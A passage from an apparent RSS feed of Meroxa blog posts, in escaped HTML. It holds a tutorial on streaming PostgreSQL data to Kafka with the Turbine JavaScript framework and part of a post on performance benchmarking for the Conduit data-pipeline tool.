      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;createHubspotContact&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] contactId for addHubspotContactToList:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;contactId &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get contactId via createHubspotContact. contactId:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Add each contact we created to a specific HubSpot list&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;addHubspotContactToList&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;381&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Return the modified Postgres records to write to Snowflake&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed, you will see that your HubSpot account has all the contacts for companies in your PostgreSQL DB table, and they will be added to the list you specify in the &lt;code class=&quot;language-text&quot;&gt;addHubspotContactToList&lt;/code&gt; function. If you opted into moving your data into Snowflake, you will see the enriched data populate in the &lt;code class=&quot;language-text&quot;&gt;leads_from_pg&lt;/code&gt; table and in your &lt;code class=&quot;language-text&quot;&gt;leads_from_pg_topic&lt;/code&gt; Kafka topic. As records come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record.&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Data Streaming from PostgreSQL to Apache Kafka in 4 Lines of Code w/ CDC]]></title><description><![CDATA[Stream data from PostgreSQL to Apache Kafka using four lines of code with change data capture.]]></description><link>https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 08 Nov 2022 21:36:35 GMT</pubDate><content:encoded>&lt;p&gt;Writing data into Apache Kafka can become a tedious task for any data developer. If your applications insert data into your database in real time and you want to act on that data by moving it into a Kafka Topic, Meroxa can help you do that in a few lines of code.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;Here we will show an example of multiple applications inserting data into a PostgreSQL database, where we then use Meroxa to stream that data to a Kafka Topic instantly as records are inserted.&lt;/p&gt;
&lt;p&gt;Below we can see how data flows from your &lt;code class=&quot;language-text&quot;&gt;Applications&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;PostgreSQL&lt;/code&gt;, and then where &lt;code class=&quot;language-text&quot;&gt;Meroxa&lt;/code&gt; comes in to stream it in real-time to your &lt;code class=&quot;language-text&quot;&gt;Kafka Topic&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts.png&quot; alt=&quot;Flowcharts&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Take Me To The Code!&lt;/h2&gt;
&lt;p&gt;In this example, we will use the &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;Javascript Turbine framework&lt;/a&gt; to get records from PostgreSQL and write them to your Kafka Topic.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go/&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt; as well, with many more coming!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Apache Kafka/Confluent Cloud Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, you can follow these steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI; you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and Kafka Topic Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring your Postgres&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture), we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Kafka&lt;/strong&gt; (&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Guide on setting up Confluent Cloud/Kafka&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a Kafka connection named &lt;code class=&quot;language-text&quot;&gt;apachekafka&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type kafka \
  --url &quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init meroxa-kafka &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Writing The 4 Lines Of Code&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;meroxa-kafka&lt;/code&gt; folder in your preferred IDE. You will get boilerplate code that explains where to wire up the source and destination resources you named in Step 1. In our case, we just need to do the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_data_table&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Optional, Process each record that comes in!&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// let transformed = await turbine.process(records, this.transform);&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, identify your Kafka/Confluent source name configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;apachekafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which Topic to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_data_topic&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 &lt;code class=&quot;language-text&quot;&gt;await turbine.process&lt;/code&gt; allows developers to write a function that will be run on each record. If you need to pre-process your data before sending it to your Kafka topic, you can write that code here.&lt;/p&gt;
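To make that concrete, here is a minimal sketch of what such a per-record function could look like. The plain-object record shape and the `processed_at` field are purely illustrative assumptions; the real record API is defined by the Turbine JS framework, so consult its docs for the exact accessors:

```javascript
// Hypothetical pre-processing step: stamp each record with the time it
// was processed, leaving all other fields untouched. The plain-object
// record shape here is an illustrative assumption, not the Turbine API.
function transform(records) {
  return records.map((record) => ({
    ...record,
    processed_at: new Date().toISOString(),
  }));
}
```

A function like this is what you would hand to `turbine.process` in the commented-out line of the example above.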
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed, you will see your Kafka Topic populate with all the data from the PostgreSQL table. You can also insert a record into your table to see it stream over live in Confluent Cloud!&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Testing the Limits: Performance Benchmarks for Conduit]]></title><description><![CDATA[We decided to build a performance benchmark for Conduit early, so we could determine how much it can handle and what it takes to break it.]]></description><link>https://meroxa.com/blog/performance-benchmarks</link><guid isPermaLink="false">https://meroxa.com/blog/performance-benchmarks</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Thu, 03 Nov 2022 12:46:30 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Conduit is meant as a Kafka Connect replacement with a better developer experience, but it’s just as easy to use it to build real-time data pipelines. For that reason, we didn’t want to wait too long to find out how much Conduit can handle, or what it takes to break it. To answer those two questions, we developed a &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/&quot;&gt;benchmarking tool&lt;/a&gt;. In this blog post, we’ll share our experience building and using it.&lt;/p&gt;
&lt;h2&gt;Types of performance testing&lt;/h2&gt;
&lt;p&gt;There are &lt;a href=&quot;https://en.wikipedia.org/wiki/Software_performance_testing&quot;&gt;different types&lt;/a&gt; of performance testing, and in Conduit we started with the following three:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load testing (i.e. testing Conduit with expected load)&lt;/li&gt;
&lt;li&gt;Stress testing (i.e. testing Conduit with unusually high load)&lt;/li&gt;
&lt;li&gt;Spike testing (i.e. testing Conduit with suddenly increasing or decreasing loads)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We don’t plan to stop here: we intend to expand our tests to include other types of performance testing, especially soak and capacity testing.&lt;/p&gt;
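For intuition, the three load shapes can be sketched as simple rate schedules, expressed as records per second as a function of elapsed time. The steady-load and stress numbers below are invented for illustration; the spike shape mirrors the burst workload described later in this post (a 10 msg/s baseline with 30-second bursts of 1000 msg/s):

```javascript
// Rate schedules (records/s) as a function of elapsed seconds.
// "load" and "stress" use invented steady rates; "spike" alternates a
// 10 msg/s baseline with 30-second bursts of 1000 msg/s.
const loadShapes = {
  load: () => 1000,
  stress: () => 20000,
  spike: (t) => (Math.floor(t / 30) % 2 === 0 ? 10 : 1000),
};
```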
&lt;h2&gt;Principles&lt;/h2&gt;
&lt;p&gt;Firstly, let’s mention the principles upon which we built this version of benchmarks:&lt;/p&gt;
&lt;h3&gt;It should be possible to track performance of Conduit itself (i.e. without connectors included)&lt;/h3&gt;
&lt;p&gt;One thing we’re especially interested in is the performance of Conduit itself. Let’s remember what a pipeline looks like:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/xd-68zH-VyMRIrj-M7NyBzO6CmbO2jsfVMIcYuFoX5MdcLPNyHeWUln_NEZYL0u74MSxqUz6mRGBd76QMmXuI24ZAqkAHLad4jQAdec67yc3Jbcu403ZsLuCM1EWEQee-7qD6gtL57ZDW1g9CyQQ25Tpsp-Onc6kqLJe4MDzswbB2wBeBhIWebONfg&quot; alt=&quot;Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;Connectors are pluggable components which can greatly affect the performance of a pipeline. For that reason, we decided to have a number of tests which will cancel out the effects of connectors. We achieved this using two special types of connectors:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; source, for which generating a record comes at virtually no cost, but can be configured to send data at a specified rate (or rates, to simulate spikes).&lt;/li&gt;
&lt;li&gt;A NoOp destination which simply drops all records without doing anything.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;It should be possible to track performance of Conduit with the connectors included&lt;/h3&gt;
&lt;p&gt;While zooming in on Conduit’s own performance is definitely helpful, we don’t want the performance testing framework to restrict us to that and make it impossible to test Conduit together with connectors. Testing with connectors would be helpful for a number of reasons:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To know what, and what not to expect from a production environment&lt;/li&gt;
&lt;li&gt;To try reproducing behavior from a production environment&lt;/li&gt;
&lt;li&gt;To conduct a performance test on a connector you developed (e.g. you may have developed a source connector, so you can test it using the NoOp destination connector)&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Benchmarks are run on-demand (automated benchmarks are planned for later)&lt;/h3&gt;
&lt;p&gt;As a first step, it’s acceptable if the performance tests are run manually. Automated tests are a great tool for comparing the performance of two releases, or for making sure that code changes didn’t introduce degradations. However, before answering the question “&lt;em&gt;was this a good change from a previous state?&lt;/em&gt;”, we need to establish a baseline. Automated benchmarks &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/424&quot;&gt;are on our roadmap&lt;/a&gt;, and with that we hope to be able to answer both questions.&lt;/p&gt;
&lt;h3&gt;It&apos;s easy to manage workloads&lt;/h3&gt;
&lt;p&gt;Workloads are one of the most important parts of a performance test, so we’d like to be able to add them easily. In Conduit’s case, there are two significant parts of a workload:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Conduit’s own configuration&lt;/li&gt;
&lt;li&gt;Pipeline setup&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ideally, both configurations can exist in files. At the time we developed the benchmarking framework, pipeline configuration files were still in progress, so workloads are specified via Bash scripts, which create pipelines using the HTTP API. &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/d8458e386612082264c242f7553c8d9b12fa8608/workloads/small-messages-burst.sh&quot;&gt;Here&lt;/a&gt; you can find an example of a workload which simulates bursts, i.e. conducts spike testing.&lt;/p&gt;
&lt;p&gt;The connector configuration (which is what is used to generate load) can be clearly seen in the scripts. Still, the scripts are relatively verbose and we plan to replace them with &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/32&quot;&gt;pipeline configuration files&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Metrics of interest&lt;/h2&gt;
&lt;p&gt;When we set out to write the benchmarking framework, one of the first questions we answered was “&lt;em&gt;what are we actually interested in?”.&lt;/em&gt; Generally speaking, in performance tests we want to know how fast the work was performed, but also what resources have been used.&lt;/p&gt;
&lt;p&gt;As for the “work performed” part, we chose to monitor the number of records per second and the number of bytes per second, as they are the most important indicators of a pipeline’s performance. If you have metrics related to individual objects/events (for example, we track the time Conduit spends on a record), it’s also useful to show percentiles.&lt;/p&gt;
&lt;p&gt;With regards to resource usage, we’re generally interested in CPU and memory usage. Conduit itself doesn’t use disk or network heavily, so we’re not keeping a close eye on those.&lt;/p&gt;
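To make the percentile idea above concrete, here is a minimal nearest-rank sketch. It is illustrative only; in our setup these figures come from Prometheus metrics rather than hand-rolled code:

```javascript
// Nearest-rank percentile over a list of samples, e.g. per-record
// processing times in milliseconds. Sorts a copy ascending and picks
// the sample at rank ceil(p% * n). Illustrative sketch only.
function percentile(samples, p) {
  const sorted = [...samples].sort((a, b) => a - b);
  const rank = Math.ceil((p / 100) * sorted.length);
  return sorted[Math.max(rank - 1, 0)];
}
```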
&lt;h2&gt;Data collection&lt;/h2&gt;
&lt;p&gt;Regardless of what metrics you define, all the data collected needs to be linked to the actual test it belongs to. This can be the test name, a timestamp, the version of the system you’re testing, the version of the test framework, etc.&lt;/p&gt;
&lt;p&gt;Conduit comes with a number of predefined metrics. The available metrics are exposed through the HTTP API and are ready to be scraped by Prometheus. You can find more information about the metrics &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/metrics.md&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
